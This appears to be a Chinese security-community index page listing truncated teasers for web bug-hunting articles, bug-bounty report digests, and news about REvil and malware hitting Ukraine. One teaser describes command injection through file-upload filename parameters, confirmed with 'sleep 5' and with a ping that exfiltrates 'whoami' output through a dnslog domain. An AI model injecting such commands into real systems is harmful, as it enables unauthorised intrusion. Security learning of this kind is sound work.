在安全小天地平台的火器中看到一个资产，居然是空白页面，空白页面就没有漏洞？？？偏偏不信邪，上手就是干！ http://xxx.target.com 打开页面啥也没有，一片空白 F12看下JS中的API接口，发现有...

思考题?：当我们遇到这些解析到内网IP的域名的时候，可以干什么？ 提示1: 可参考【搬运工】版块帖子 http://zone.huoxian.cn/t/porter?sort=newest 文字来源于- 火线 Zone-云安全社区，安全小天...

0x01 某天下午在看安全小天地资产时候发现了一个状态码为200，返回包却存在报错信息的报错界面。 由于漏洞已经修复，报错信息已经无，请自行脑补，大概就是报错出了一大堆东西，其中有个参数为...

利用burp插件进行被动式扫描可以极大提高挖洞效率，由p1g3写的这两个插件会自动收集通过burp的jsonp、cors跨域请求，只需人工筛选响应中带有敏感信息的请求并进行利用即可： http://github.com/...

白帽训练营的第一个主题信息收集。在我们渗透测试/漏洞挖掘过程中，信息收集是一个相对比较重要的阶段，有助于我们扩大攻击面。 ?文章内容需登陆状态才能查看，没有安全小天地平台账号的用户请...

漏洞报告 Shopify 【50000刀】#1087489 Github access token exposure 今日最佳：这哥们在GitHub上发现Shopify员工开发的一个Electron应用，里面有Github access token，可以用于访问Shopify的g...

打开xxx.com，f12翻js文件， 里面一堆接口，但只有查找menu列表的接口可以访问，http://xxx.com/api/v1/menu/list js文件中没有添加和删除menu信息的接口，但是之前搞过类似的，这里就想着构造...

学习的本质是模仿，创造的精髓在洞察。 1、如何学习web安全？ 2、如何挖到第一个漏洞？ 我的答案是： 1、掌握最基本的信息收集技巧 2、理解http数据包 3、使用burp进行http流量的截断和重放 4、...

文件上传表单中出现的命令注入漏洞，常出现在filename或path参数中，可以使用sleep 5确认响应延时后再用ping whoami.xxx.dnslog.cn获取命令执行结果： 文字来源于- 火线 Zone-云安全社区，安全...

注意：本文章只适用于有授权书的项目，切忌不要非法操作，本号不负任何责任，本文不会带上任何工具链接，如有需要自行查找 在信息安全这一行业，我们会遇到各种各样的项目点，比如一个目标到100...

漏洞报告 Acronis #1070533 Acronis True Image 2021 (windows) does not validate server hostname on a login TLS connection Elastic #1218680 Improper authorization on /api/as/v1/creden...

漏洞报告 Zomato 【750刀】安卓deeplink利用 http://hackerone.com/reports/532225 挖洞技巧 【15000刀】npm漏洞五连杀 CVE-2021-32804 ($10,000) CVE-2021-32803 ($2,000) CVE-2021-37701 ($2,...

文字来源于- 火线 Zone-云安全社区，安全小天地只做文章分享，如有侵权，请联系站长删除

web漏洞挖掘指南 XSS跨站脚本攻击 一、漏洞原理 1. 跨站脚本英文全称（Cross Site Scripting跨站脚本），为了不和css层叠样式表(英文全称：Cascading Style Sheets)混淆，因此将跨站脚本缩写为X...

近日，俄罗斯联邦安全局FSB发布新闻稿称，在美国当局的呼吁下，俄罗斯联邦安全局与俄罗斯内务部合作，在莫斯科、圣彼得堡、列宁格勒和利佩茨克地区查明并捣毁了有组织犯罪团伙REvil。REvil是世...

2022年1月15日，微软安全团队发布了一份报告，称在乌克兰政府机构及与乌克兰密切合作的组织系统中观察到破坏性恶意软件。该恶意软件一旦被攻击者激活，受感染的计算机系统将无法运行。微软威胁...